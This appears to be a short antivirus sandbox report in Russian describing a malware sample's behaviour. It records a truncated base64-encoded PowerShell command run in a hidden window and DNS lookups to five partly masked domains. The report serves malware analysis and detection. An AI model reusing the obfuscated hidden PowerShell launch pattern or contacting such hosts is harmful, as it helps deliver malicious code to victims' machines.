Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...
- DNS ASK bo##ia.com
- DNS ASK di####learning.cn
- DNS ASK te######aoutdoorliving.com
- DNS ASK mo####delzein.com
- DNS ASK in#####ial-parks.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...' (со скрытым окном)